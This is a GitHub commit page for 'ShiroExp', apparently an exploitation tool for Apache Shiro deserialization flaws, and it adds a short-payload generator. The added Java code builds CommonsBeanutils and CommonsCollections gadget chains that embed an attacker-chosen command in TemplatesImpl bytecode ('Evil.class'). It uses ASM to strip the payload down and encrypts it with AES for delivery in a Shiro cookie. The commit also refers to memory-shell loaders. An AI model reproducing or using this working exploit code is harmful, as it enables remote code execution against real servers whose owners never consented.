1. 修复post包解析

2. 添加payload缩短生成工具
safe6Sec · May 12, 2022 · 04a1099 · 04a1099
1 parent d406007
commit 04a1099
Show file tree

Hide file tree

Showing 29 changed files with 1,001 additions and 211 deletions.
diff --git a/pom.xml b/pom.xml
@@ -33,6 +33,16 @@
       <artifactId>javafx-fxml</artifactId>
       <version>11.0.2</version>
     </dependency>
+    <dependency>
+      <groupId>org.ow2.asm</groupId>
+      <artifactId>asm</artifactId>
+      <version>9.2</version>
+    </dependency>
+    <dependency>
+      <groupId>org.ow2.asm</groupId>
+      <artifactId>asm-commons</artifactId>
+      <version>9.2</version>
+    </dependency>
 
     <dependency>
       <groupId>com.google.guava</groupId>

diff --git a/src/main/java/cn/safe6/Main.java b/src/main/java/cn/safe6/Main.java
@@ -18,7 +18,7 @@ public void start(Stage primaryStage) {
             ClassLoader classLoader = getClass().getClassLoader();
             Parent root = FXMLLoader.load(classLoader.getResource("sample.fxml"));
 
-            primaryStage.setTitle(" Safe6Sec ShiroExp v1.0          20210801");
+            primaryStage.setTitle(" Safe6Sec ShiroExp v1.1          20220512");
             //primaryStage.setAlwaysOnTop(true);
            // primaryStage.setResizable(false);
 

diff --git a/src/main/java/cn/safe6/Controller.java → .../java/cn/safe6/controller/Controller.java b/src/main/java/cn/safe6/Controller.java → .../java/cn/safe6/controller/Controller.java
@@ -1,13 +1,10 @@
-package cn.safe6;
+package cn.safe6.controller;
 
 import cn.safe6.core.Constants;
 import cn.safe6.core.ControllersFactory;
 import cn.safe6.core.http.Request;
 import cn.safe6.core.http.Response;
 import cn.safe6.core.jobs.BurstJob;
-import cn.safe6.payload.memshell.BehinderLoader;
-import cn.safe6.payload.memshell.BehinderLoader2;
-import cn.safe6.payload.memshell.Loader;
 import cn.safe6.payload.memshell.Loader1;
 import cn.safe6.util.*;
 import javafx.application.Platform;
@@ -24,18 +21,13 @@
 import javafx.scene.control.Alert.AlertType;
 import javafx.scene.image.Image;
 import javafx.scene.image.ImageView;
-import javafx.scene.layout.AnchorPane;
 import javafx.scene.layout.GridPane;
 import javafx.scene.layout.HBox;
 import javafx.stage.Modality;
 import javafx.stage.Stage;
-import javafx.stage.StageStyle;
 import javafx.stage.Window;
 import org.apache.commons.io.FileUtils;
-import org.apache.http.client.methods.CloseableHttpResponse;
-import org.apache.http.util.EntityUtils;
 
-import javax.servlet.jsp.PageContext;
 import java.io.*;
 import java.lang.reflect.Method;
 import java.net.*;
@@ -166,6 +158,7 @@ public void basic() {
 
         ObservableList<String> gadgetData = FXCollections.observableArrayList();
         gadgetData.add("CommonsBeanutils1");
+        gadgetData.add("CommonsBeanutils1b");
         gadgetData.add("CommonsCollections11");
         gadgetData.add("CommonsCollectionsK1");
         gadgetData.add("CommonsCollectionsK2");
@@ -463,6 +456,7 @@ private void validAllDataAndSetConfig() {
             } catch (Exception e) {
                 // e.printStackTrace();
                 Tools.alert("HTTP请求格式错误", "请输入一个有效的HTTP请求");
+                return;
             }
             if (request != null) {
                 paramsContext.put("header", request.getHeader());
@@ -751,4 +745,16 @@ public PasswordAuthentication getPasswordAuthentication() {
     }
 
 
+    public void payloadGen(ActionEvent actionEvent) throws IOException {
+        ClassLoader classLoader = getClass().getClassLoader();
+        Parent root = FXMLLoader.load(classLoader.getResource("payloadGen.fxml"));
+
+        Stage stage = new Stage();
+        stage.initModality(Modality.APPLICATION_MODAL);
+        //stage.setOpacity(1);
+        stage.setTitle("短payload生成");
+        stage.setScene(new Scene(root, 630, 410));
+        stage.setResizable(false);
+        stage.showAndWait();
+    }
 }
diff --git a/src/main/java/cn/safe6/controller/PayloadGen.java b/src/main/java/cn/safe6/controller/PayloadGen.java
@@ -0,0 +1,158 @@
+package cn.safe6.controller;
+
+import cn.safe6.core.Constants;
+import cn.safe6.payload.shortPayload.asm.Resolver;
+import cn.safe6.payload.shortPayload.payload.*;
+import cn.safe6.util.PayloadEncryptTool;
+import javafx.application.Platform;
+import javafx.collections.FXCollections;
+import javafx.collections.ObservableList;
+import javafx.event.ActionEvent;
+import javafx.scene.control.*;
+
+import java.io.File;
+import java.lang.reflect.Method;
+import java.nio.file.Files;
+import java.nio.file.Paths;
+import java.util.Base64;
+
+public class PayloadGen {
+    public TextField keyTF;
+    public ChoiceBox gadget;
+    public TextField cmd;
+    public CheckBox aesType;
+    public TextArea out;
+    public Button genButton;
+
+
+    public void initialize() {
+        ObservableList<String> gadgetData = FXCollections.observableArrayList();
+        gadgetData.add("cb1");
+        gadgetData.add("cc1");
+        gadgetData.add("cc2");
+        gadgetData.add("cc3");
+        gadgetData.add("cc4");
+        gadgetData.add("cc5");
+        gadgetData.add("cc6");
+        gadgetData.add("cc7");
+        gadgetData.add("cck1");
+        gadgetData.add("cck2");
+        gadgetData.add("cck4");
+        gadgetData.add("cck3");
+        gadget.setValue("cb1");
+        gadget.setItems(gadgetData);
+        out.setWrapText(true);
+    }
+
+    public void gen(ActionEvent actionEvent) throws Exception {
+
+        Platform.runLater(() -> {
+            genButton.setDisable(true);
+        });
+        genButton.setDisable(true);
+        genButton.setDisable(true);
+
+        String gadgetName=gadget.getSelectionModel().getSelectedItem().toString();
+        String command =cmd.getText();
+        byte[] payload = new byte[0];
+        String key = keyTF.getText();
+
+        switch (gadgetName.toUpperCase()) {
+            case "CB1":
+                System.out.println("CommonsBeanutils1");
+                payload =resolveTemplatesPayload(CB1.class, command);
+                break;
+            case "CC1":
+                System.out.println("CommonsCollections1");
+                payload =resolveNormalPayload(CC1.class, command);
+                break;
+            case "CC2":
+                System.out.println("CommonsCollections2");
+                payload = resolveTemplatesPayload(CC2.class, command);
+                break;
+            case "CC3":
+                System.out.println("CommonsCollections3");
+                payload = resolveTemplatesPayload(CC3.class, command);
+                break;
+            case "CC4":
+                System.out.println("CommonsCollections4");
+                payload = resolveTemplatesPayload(CC4.class, command);
+                break;
+            case "CC5":
+                System.out.println("CommonsCollections5");
+                payload = resolveNormalPayload(CC5.class, command);
+                break;
+            case "CC6":
+                System.out.println("CommonsCollections6");
+                payload = resolveNormalPayload(CC6.class, command);
+                break;
+            case "CC7":
+                System.out.println("CommonsCollections7");
+                payload = resolveNormalPayload(CC7.class, command);
+                break;
+            case "CCK1":
+                System.out.println("CommonsCollectionsK1");
+                payload = resolveTemplatesPayload(CCK1.class, command);
+                break;
+            case "CCK2":
+                System.out.println("CommonsCollectionsK2");
+                payload = resolveTemplatesPayload(CCK2.class, command);
+                break;
+            case "CCK3":
+                System.out.println("CommonsCollectionsK3");
+                payload =  resolveNormalPayload(CCK3.class, command);
+                break;
+            case "CCK4":
+                System.out.println("CommonsCollectionsK4");
+                payload =  resolveNormalPayload(CCK4.class, command);
+                break;
+            default:
+                System.out.println("error gadget name");
+        }
+        String encryptData;
+        if (aesType.getText().equals(Constants.AES_GCM)) {
+            encryptData = PayloadEncryptTool.AesGcmEncrypt(payload, key);
+        } else {
+            encryptData = PayloadEncryptTool.AesCbcEncrypt(payload, key);
+        }
+        out.setText(encryptData);
+        out.appendText("\r\n");
+        out.appendText("\r\n");
+        out.appendText(String.format("payload长度:%s",encryptData.length()));
+        out.appendText("\r\n");
+        Platform.runLater(() -> {
+            genButton.setDisable(false);
+        });
+    }
+
+
+    private static byte[] resolveNormalPayload(Class<?> target,
+                                             String command) throws Exception {
+        Method method = target.getMethod("getPayloadUseCommand", String.class);
+        byte[] payload = (byte[]) method.invoke(null, command);
+        //byte[] data = Base64.getEncoder().encode(payload);
+        return payload;
+        //System.out.println("Payload length: " + new String(data).length());
+        //System.out.println("Write Base64 Payload output.txt...");
+       // Files.write(Paths.get("output.txt"), data);
+
+    }
+
+    @SuppressWarnings("all")
+    private static byte[] resolveTemplatesPayload(Class<?> target,
+                                                String command) throws Exception {
+        String path = System.getProperty("user.dir") + File.separator + "Evil.class";
+        Generator.saveTemplateImpl(path, command);
+        Resolver.resolve("Evil.class");
+        byte[] newByteCodes = Files.readAllBytes(Paths.get("Evil.class"));
+        Method method = target.getMethod("getPayloadUseByteCodes", byte[].class);
+        byte[] payload = (byte[]) method.invoke(null, newByteCodes);
+        //byte[] payload = Base64.getEncoder().encode((byte[]) method.invoke(null, newByteCodes));
+        //System.out.println("Payload length: " + new String(payload).length());
+        //System.out.println("Write Base64 Payload output.txt...");
+       // Files.write(Paths.get("output.txt"), payload);
+        Files.delete(Paths.get("Evil.class"));
+        //Files.delete(Paths.get(path));
+        return payload;
+    }
+}
diff --git a/src/main/java/cn/safe6/Tool.java → src/main/java/cn/safe6/controller/Tool.java b/src/main/java/cn/safe6/Tool.java → src/main/java/cn/safe6/controller/Tool.java
@@ -1,16 +1,13 @@
-package cn.safe6;
+package cn.safe6.controller;
 
 import cn.safe6.core.Constants;
 import cn.safe6.core.ControllersFactory;
 import cn.safe6.util.HttpClientUtil;
 import cn.safe6.util.HttpTool;
 import cn.safe6.util.PayloadEncryptTool;
 import cn.safe6.util.ShiroTool;
-import javafx.collections.FXCollections;
-import javafx.collections.ObservableList;
 import javafx.event.ActionEvent;
 import javafx.fxml.FXML;
-import javafx.scene.control.ChoiceBox;
 import javafx.scene.control.TextField;
 
 import java.lang.reflect.Method;

diff --git a/src/main/java/cn/safe6/core/jobs/BurstJob.java b/src/main/java/cn/safe6/core/jobs/BurstJob.java
@@ -1,6 +1,6 @@
 package cn.safe6.core.jobs;
 
-import cn.safe6.Controller;
+import cn.safe6.controller.Controller;
 import cn.safe6.core.Constants;
 import cn.safe6.core.ControllersFactory;
 import cn.safe6.payload.URLDNS;

diff --git a/src/main/java/cn/safe6/payload/shortPayload/asm/Resolver.java b/src/main/java/cn/safe6/payload/shortPayload/asm/Resolver.java
@@ -0,0 +1,28 @@
+package cn.safe6.payload.shortPayload.asm;
+
+import org.objectweb.asm.ClassReader;
+import org.objectweb.asm.ClassVisitor;
+import org.objectweb.asm.ClassWriter;
+import org.objectweb.asm.Opcodes;
+
+import java.nio.file.Files;
+import java.nio.file.Paths;
+
+
+public class Resolver {
+    public static void resolve(String path) {
+        try {
+            byte[] bytes = Files.readAllBytes(Paths.get(path));
+            ClassReader cr = new ClassReader(bytes);
+            ClassWriter cw = new ClassWriter(ClassWriter.COMPUTE_FRAMES);
+            int api = Opcodes.ASM9;
+            ClassVisitor cv = new ShortClassVisitor(api, cw);
+            int parsingOptions = ClassReader.SKIP_DEBUG | ClassReader.SKIP_FRAMES;
+            cr.accept(cv, parsingOptions);
+            byte[] out = cw.toByteArray();
+            Files.write(Paths.get(path), out);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+}
diff --git a/src/main/java/cn/safe6/payload/shortPayload/asm/ShortClassVisitor.java b/src/main/java/cn/safe6/payload/shortPayload/asm/ShortClassVisitor.java
@@ -0,0 +1,23 @@
+package cn.safe6.payload.shortPayload.asm;
+
+import org.objectweb.asm.ClassVisitor;
+import org.objectweb.asm.MethodVisitor;
+
+public class ShortClassVisitor extends ClassVisitor {
+    private final int api;
+
+    public ShortClassVisitor(int api, ClassVisitor classVisitor) {
+        super(api, classVisitor);
+        this.api = api;
+    }
+
+    @Override
+    public MethodVisitor visitMethod(int access, String name, String descriptor, String signature, String[] exceptions) {
+        // delete transform method
+        if (name.equals("transform")) {
+            return null;
+        }
+        MethodVisitor mv = super.visitMethod(access, name, descriptor, signature, exceptions);
+        return new ShortMethodAdapter(this.api, mv, name);
+    }
+}
diff --git a/src/main/java/cn/safe6/payload/shortPayload/asm/ShortMethodAdapter.java b/src/main/java/cn/safe6/payload/shortPayload/asm/ShortMethodAdapter.java
@@ -0,0 +1,17 @@
+package cn.safe6.payload.shortPayload.asm;
+
+import org.objectweb.asm.Label;
+import org.objectweb.asm.MethodVisitor;
+import org.objectweb.asm.Opcodes;
+
+public class ShortMethodAdapter extends MethodVisitor implements Opcodes {
+
+    public ShortMethodAdapter(int api, MethodVisitor mv, String methodName) {
+        super(api,mv);
+    }
+
+    @Override
+    public void visitLineNumber(int line, Label start) {
+        // delete line number
+    }
+}
diff --git a/src/main/java/cn/safe6/payload/shortPayload/payload/CB1.java b/src/main/java/cn/safe6/payload/shortPayload/payload/CB1.java
@@ -0,0 +1,34 @@
+package cn.safe6.payload.shortPayload.payload;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import org.apache.commons.beanutils.BeanComparator;
+
+import java.util.PriorityQueue;
+
+@SuppressWarnings("all")
+public class CB1 extends Payload {
+    public static byte[] getPayloadUseCommand(String cmd) {
+        byte[] code = Generator.getTemplateImplBytes(cmd);
+        return getPayloadUseByteCodes(code);
+    }
+
+    public static byte[] getPayloadUseByteCodes(byte[] byteCodes) {
+        try {
+            TemplatesImpl templates = new TemplatesImpl();
+            setFieldValue(templates, "_bytecodes", new byte[][]{byteCodes});
+            setFieldValue(templates, "_name", "t");
+            setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
+            final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
+            final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
+            queue.add("1");
+            queue.add("1");
+            setFieldValue(comparator, "property", "outputProperties");
+            setFieldValue(queue, "queue", new Object[]{templates, templates});
+            return serialize(queue);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+        return new byte[]{};
+    }
+}